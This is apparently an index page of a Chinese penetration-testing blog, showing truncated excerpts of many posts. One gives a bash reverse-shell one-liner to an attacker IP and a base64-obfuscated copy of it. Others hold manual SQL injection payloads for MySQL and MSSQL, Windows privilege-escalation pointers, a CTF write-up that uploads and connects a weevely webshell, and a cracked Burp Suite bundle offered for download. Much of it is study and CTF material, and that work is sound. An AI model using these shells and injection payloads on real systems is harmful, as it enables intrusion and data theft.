反弹shell的各种姿势
转载自 Norah C.IV转载自 Bypass 在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。) Linux 反弹shell姿势一:bash反弹12bash -i >& /dev/tcp/192.168.99.242/1234 0>&1base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'在线编码地址:http://www.jackson-t.ca/runtime-exec-payloads.html 其他 ...
SQL手工注入总结
转载自 Norah C.IV转载自 乌雲安全 虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册的形式,便于以后的复习与查阅,文中内容可能会存在错误,望师傅们斧正! 0x01 Mysql 手工注入1.1 联合注入123?id=1' order by 4--+?id=0' union select 1,2,3,database()--+?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" - ...
Web常见漏洞描述及修复建议
转载自 Norah C.IV转载自 我超怕的 1.SQL注入 漏洞描述 Web程序中对于用户提交的参数未做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 修复建议 代码层最佳防御sql漏洞方案:使用预编译sql语句查询和绑定变量。 (1)使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 (2)对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 (3)确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 (4)数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 (5)网站每个数据层的编码统 ...
Windows提权总结
转载自 Norah C.IV转载自 ShAun 0x01 简介提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。 Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等 0x02 按提权方法分类2.1 系统内核溢出漏洞提权此提权方法即是通过系统本身存在的一些漏洞,未曾打相应的补丁而暴露出来的提权方法,依托可以提升权限的EXP和它们的补丁编号,进行提升权限。 下面是几个方便查找相应补丁漏洞的辅助查询页面: 123456789101112Copyhttps://github.com/ianxtianxt/win-exp-https://github.com/SecWiki/windows-kernel-exploitsCopy#手工查找补丁情况systeminfoWmic qfe get Caption,Description,HotFixID,InstalledOn#MSF后渗透扫描post/w ...
常用端口信息
转载自 Norah C.IV 通过扫描服务器开放的端口以及从该端口判断服务器上存在的服务,就可以对症下药,便于渗透目标服务器。 所以在端口渗透信息的收集过程中,需要关注常见应用的默认端口和在端口上运行的服务。最常见的扫描工具就是Nmap,无状态端口扫描工具Masscan、ZMap和御剑高速TCP端口扫描工具。 常见的端口及其说明,以及攻击方向汇总如下: 文件共享服务端口: 端口号 端口说明 攻击方向 21/22/69 FTP/TFTP文件传输协议 允许匿名的上传、下载、爆破和嗅探操作 2049 Nfs服务 配置不当 139 Samba服务 爆破、未授权访问、远程代码执行 389 Ldap目录访问协议 注入、允许匿名访问、弱口令 远程连接服务端口: 端口号 端口说明 攻击方向 22 SSH远程连接 爆破、SSH隧道及内网代理转发、文件传输 23 Telnet远程连接 爆破、嗅探、弱口令 3389 Rdp远程桌面连接 Shift后门(需要Windows Server 2003以下的系统)、爆破 5900 VN ...
注入常用SQL语句整理
MSSQL很多情况下使用工具对mssql注入并不完善,所以我们就需要手工注入,一下是本人收集的一些mssql的sql语句. 手工MSSQL注入常用SQL语句 12345678910111213141516171819202122and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //当前数据库名and 1=(select @@servername) //本地服务名and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限and 1= (Select HAS_DBACCESS('master')) // ...
延时注学习
SQL盲注:基于时间延迟注入 靶场环境搭建 所需软件Phpstudy2016,sql注入靶场文件 Phpstduy 官网下载地址:https://www.xp.cn/sql注入靶场下载地址:https://github.com/Audi-1/sqli-labs 下载安装 phpstudy,下载sql注入靶场文件压缩包, 解压文件靶场环境文件,放到 phpstudy 文件目录下的 WWW 文件夹下, 然后运行 phpstudy然后访问,http://localhost/,或者 http://127.0.0.1点击 Setup/reset Database for labs 选项安装靶场数据库等文件出现这个就说明安装完成 返回访问 http://127.0.0.1 主页就行 对照 ascii 表 控制字符 ASCII 值 控制字符 ASCII 值 控制字符 ASCII 值 控制字符 NUT 32 (space) 64 @ 96 、 SOH 33 ! 65 A 97 a STX 34 “ 66 B 98 b ETX 35 # 67 C 99 c ...
上传漏洞
首先,标题是upload,提示就是上传漏洞无非就是js拦截,代码拦截,看了以下网页head头,发现js代码,关键字jpg burpsuite 抓包,配置代理 weevely 生成一句话 12weevely generate password ./1.php #use weevely在当前目录生成1.php,密码passwdmv 1.php 1.php.jpg 选择文件上传 && burpsuite 抓包 删掉.jpg 回显 upload success : upload/1592555994.1.php weevely 连接 12345weevely http://220.249.52.133:57535/upload/1592554838.1.php password # weevely 连接dir # 显示目录cd ../..发现flag.phpcat flag.php 得到flag 推荐一个上传漏洞的靶场:https://github.com/c0ny1/upload-labs
安全笔记
开始学习查库:1select schema_name from information_schema.schemata 查表:1select table_name from information_schema.tables where table_schema='security' 查列:1select column_name from information_schema.columns where table_name='users' 查字段:1select username,password from security.users sqli-lib实践1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001 ...
Bugku-web指南
webweb1https://segmentfault.com/a/1190000016750234 知识基础 涉及到的几个函数: 1.$_REQUEST: 可以获取以POST方法和GET方法提交的数据,但是速度比较慢 2.eval: 把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。 12345<?phpeval("echo'hello';echo' world';");?># outputhello world 3.var_dump: 函数用于输出变量的相关信息 1234# 数字var_dump(1); > int(1)# 字符串var_dump("string"); > string(6) "string" 解题思路 eval应该是此题的突破口,能够执行php代码。 hello是接受参数的变量,接下来就是构建hello变量,使其能够闭合var_dump,利用print_r输出 首先闭合var_dump: ...
随机笔记
按钮弹出文字 123456<script type="text/javascript"> function a(){ alert("有啥好看的"); } </script> <input type="button" value=按钮弹出文字 onClick="javascript:a()"> 表格 加粗 <strong> 倾斜 <em><i> 删除线 <del><s> 下划线 <ins><u> 盒子 <div 占一行><span 跨距> 图像 <img sr ...
Windows 安全渗透工具配置.MD
请在Windows环境变量中添加 存放脚本的文件夹路劲,建议 onedriver WIN + E >> 此电脑 > 属性 > 高级系统设置 > 高级 > 环境变量 > 系统变量 > PATH > 新建 > 存放脚本的路劲 工具推荐python换源 1pip config set global.index-url https://mirrors.aliyun.com/pypi/simple Wiresharkwireshark.org 安装的时候勾选一下拓展项目,优先安装 <img src=”https://xrsec.s3.bitiful.net/IMG/20201114191704207648.png?fmt=webp&q=48) Sqlmapgithub sqlmapproject/sqlmap 123456# sqlmap/lib/core/settings.py# 新版在第27行DEFAULT_USER_AGENT = 'Mozilla/5.0 (compatible; ...
sqlmap的使用介绍
## 一、sqlmap获取目标推荐一篇文章:https://www.comparitech.com/net-admin/sqlmap-cheat-sheet/ 1.sql注入介绍所谓SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将SQL命令注入到后台数据库引擎执行的能力,它可以通过在web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQL注入可能发生在未知HTTP数据包中任意位置。创建本地服务后,访问子页面/sqli-labs,点击Less-1,加入参数**?id=2**,会返回登录名和密码到网页上,如图 2.SQL输出级别Sqlmap的输出信息按从简到繁共分为7个级别依次为0、1、2、3、4、5和6。使用参数-v来指定某个等级,如使用参数 -v 6来指定输出级别为6。 0:只显示Python的tracebacks信息、错误信息[ERROR]和关键信息[CRITICAL] 1:同时显示普通信息[INF ...
App exe 封装教程
jpackageBurp-Suite-Launch IdeaProjects/Burp-Suite-Launch/src/burpsuite/Main.java 12345678910111213141516171819202122232425262728293031323334353637383940414243package burpsuite;public class Main { public static void main(String[] args) { new Main().shell(); } public String getPath() { String path = this.getClass().getProtectionDomain().getCodeSource().getLocation().getPath(); if (System.getProperty("os.name").contain ...
Burp-Suite 集合打包
预览 下载地址 百度云盘:skmh有无后门,请君自测 –💖 Windows Old-Burp-Suite.vbs Burp-Suite-Win.vbs license.cmd Linux Burp-Suite-Linux.sh Burp-Suite-Linux-Arm.sh 1./jdk-linux11/bin/java -noverify -jar BurpSuiteLoader.jar 1./jdk-linux-arm11/bin/java -noverify -jar BurpSuiteLoader.jar 建议配合 screen 或者 & 效果更佳 Mac Burp-Suite-Mac.zip 1234567vi /etc/profileGexport burpsuite=/Users/xr/Documents/Burp-Suiteexport PATH=$PATH:$burpsuite/:wqecho -e '$burpsuite/jdk-mac11/Contents/Home/bin/java -noverify -javaagent:$b ...